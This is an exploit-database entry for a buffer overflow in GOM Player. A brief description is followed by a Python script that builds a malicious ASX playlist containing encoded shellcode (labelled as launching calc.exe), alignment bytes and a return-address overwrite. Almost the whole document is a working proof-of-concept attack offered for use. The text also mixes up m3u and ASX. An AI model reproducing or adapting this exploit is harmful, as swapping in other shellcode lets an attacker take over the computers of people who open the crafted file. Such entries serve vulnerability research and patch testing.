GOM-Player

2012-01-21T00:00:00
ID EXPLOITPACK:E3FCFFD66D6F55F78D45A21ADDA97DAD
Type exploitpack
Reporter Debasish
Modified 2012-01-21T00:00:00

Description

There was an error when sending a response from the m3u player list. Fortunately, these errors lead to buffer overflows. This exploit is unstable. It should only be used as a POC. Once the list is imported the player will execute the BoF

                                        
                                            raw_input("[*] Press Enter to generate the crafted ASX...")
size = 2046
#Shellcode WinExec "Calc.exe" Unicode
shellcode = "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AI"
shellcode += "AIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBvz5tz9ptkthtPZOCI95hVsXKl"
shellcode += "iqqVQNR4CUrm4p1pBlSm32qFxhK1dGymgtBT7KaWXZUKNKDhyKwRD3M4kIgjNWcoPbSw2Vg9C8"
shellcode += "qpkJHPTWONmGWC5QaNrRktfZsLnvqZZxsLOmJlOl5oXmvWpdgKQzmR3pXKuPSPhNy9YXXVpMQ4"
shellcode += "LknUTeKronnLU5GYH3FKm9oL8bgzRHcEuHN1o6wUn6quYo9Mn7pUEZFjaxMkkkFMvHii3tM7Li"
shellcode += "z0yTVM6RQeUKceKvqNNsS3OK0Wsr2LKHnMxzpNsL2noxujOJn7khxOO1wuOWnSkXLQ4sNEm3xN"
shellcode += "K3OwmMDBsKuf5DvgPOlXtwljwJLqruILX8ntLu940wojgQ6kVIPXMNCL8vJnlJeRqcBLELTKLu"
shellcode += "48sNz8yLFZVo2KNLWPsKw6ZeOBOnuyC1ef0uz7dQOzSrmPFKSZTA"
buff = ''
buff += '<asx version = "3.0" ><entry><title>ArirangTV</title><ref href = "WWW.'
align = "A"                 # align to first instruction
align += "\x55\x41\x58\x41" # push ebp, pop eax
align += "\x05\x11\x11"     # add eax,11001100
align += "\x41"             # align
align += "\x2d\x10\x11"     # sub eax,11001000
align += "\x41" * 109       # padding
align += "\x40\x41\x40"     # 2x inc eax
align += "\x41"             # align
buff += align
buff += shellcode
buff += "\x41"*(size - len(align) - len(shellcode))
#eip
buff += "\xd9\x57"          # CALL EBP - 0x005700d9
                            # top of the stack
buff += "\x46"*2
buff += "\x47"*100
buff +='"/></entry></asx>'
f = open('exploits/code/output/exploit.asx','w')
f.write(buff)
f.close()
print "[*] Crafted .m3u File generated"
#print "[*] Exit"